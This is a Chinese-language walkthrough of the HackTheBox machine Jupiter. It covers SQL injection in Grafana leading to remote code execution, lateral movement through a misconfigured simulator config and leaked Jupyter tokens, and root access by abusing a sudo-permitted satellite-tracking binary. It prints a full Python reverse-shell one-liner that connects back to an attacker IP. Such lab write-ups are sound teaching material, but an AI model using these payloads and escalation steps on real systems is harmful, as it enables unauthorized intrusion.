HackTheBox - Medium - Linux - Jupiter
Jupiter
Jupiter 是一台中等难度的 Linux 机器,它有一个使用 PostgreSQL 数据库的 Grafana 实例,该数据库在权限上过度扩展,容易受到 SQL 注入的影响,因此容易受到远程代码执行的影响。一旦站稳脚跟,就会注意到一个名为 Shadow 的实用程序,这是一种科学实验工具,可以简化对真实网络应用程序的评估,但其配置文件的权限配置错误。然后,通过查看与 Jupyter Notebook 关联的日志文件来实现横向移动,这些日志文件包含次要用户的令牌。获得对此用户的访问权限后,可以通过滥用卫星跟踪系统二进制文件来实现权限提升,该二进制文件可能由次要用户使用“sudo”权限执行。
外部信息搜集
端口扫描
循例nmap
Web枚举
访问80跳转到了jupiter.htb,加入/etc/hosts
vhost扫描
ffuf扫出一个vhost
kiosk子域
SQL注入
我在查看bp日志的时候发现了这个包,里面包含了非常显眼的sql查询语句
把请求给到repeater,使用version()查询一下,发现执行成功
接下啦就不再需要脑子了,我们可以通过sqlmap一键尝试RCE
正如所料,是DBA
来个常规python3 reverse shell payload
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.18",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' &
payload最后的&不能少,否则shell可能会被杀死
getshell
本地横向移动 -> juno
传个pspy
2023/12/22 07:24:01 CMD: UID=1000 PID=2159 |
2023/12/22 07:24:01 CMD: UID=1000 PID=2160 | rm -rf /dev/shm/shadow.data
2023/12/22 07:24:01 CMD: UID=1000 PID=2161 | /home/juno/.local/bin/shadow /dev/shm/network-simulation.yml
2023/12/22 07:24:01 CMD: UID=1000 PID=2164 | sh -c lscpu --online --parse=CPU,CORE,SOCKET,NODE
2023/12/22 07:24:01 CMD: UID=1000 PID=2165 | lscpu --online --parse=CPU,CORE,SOCKET,NODE
2023/12/22 07:24:01 CMD: UID=1000 PID=2170 |
2023/12/22 07:24:02 CMD: UID=1000 PID=2171 | /home/juno/.local/bin/shadow /dev/shm/network-simulation.yml
2023/12/22 07:24:02 CMD: UID=1000 PID=2173 | /home/juno/.local/bin/shadow /dev/shm/network-simulation.yml
2023/12/22 07:24:02 CMD: UID=1000 PID=2175 | /home/juno/.local/bin/shadow /dev/shm/network-simulation.yml
我们可以看到/home/juno/.local/bin/shadow这个应用似乎正将yml文件名作为输入并运行
这个文件我们有权读写
当我查看该文件时,接下来要做的事情便不再需要解释了
python3 payload
发现它确实执行了,但似乎执行没成功,反正我没get到shell
换种方法,直接写入ssh key
这次也执行了
登一下ssh看看有没有成功
本地横向移动 -> jovian
我看到当前用户具有另一个组,下意识查看那个组是否具有某些文件或目录
当我查看其中一个日志文件后,我发现本地8888端口的http服务应该就是jupyter
ssh做个端口转发
通过日志文件里的正确token,我们能够登录进去
进入这个文件
在这里我们能够运行python代码
直接来个python shellcode
nc
本地权限提升
sudo -l
通过strace发现它会读取/tmp/config.json,但由于不清楚它的配置究竟是怎么样的,所以即使我们自己创建了文件也没有意义
find
在那个目录下有我们想要的config.json
{
"tleroot": "/tmp/tle/",
"tlefile": "weather.txt",
"mapfile": "/usr/local/share/sattrack/map.json",
"texturefile": "/usr/local/share/sattrack/earth.png",
"tlesources": [
"http://celestrak.org/NORAD/elements/weather.txt",
"http://celestrak.org/NORAD/elements/noaa.txt",
"http://celestrak.org/NORAD/elements/gp.php?GROUP=starlink&FORMAT=tle"
],
"updatePerdiod": 1000,
"station": {
"name": "LORCA",
"lat": 37.6725,
"lon": -1.5863,
"hgt": 335.0
},
"show": [
],
"columns": [
"name",
"azel",
"dis",
"geo",
"tab",
"pos",
"vel"
]
}
将config.json复制到/tmp
运行看看效果
主要关注这句话
tleroot does not exist, creating it: /tmp/tle/
我们可以将tleroot改到/root/.ssh,然后它就会去请求tlesources的文件复制到tleroot,我们可以指定ssh public key
编辑/tmp/config.json
再次执行
ssh登root
root flag 还在老地方
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!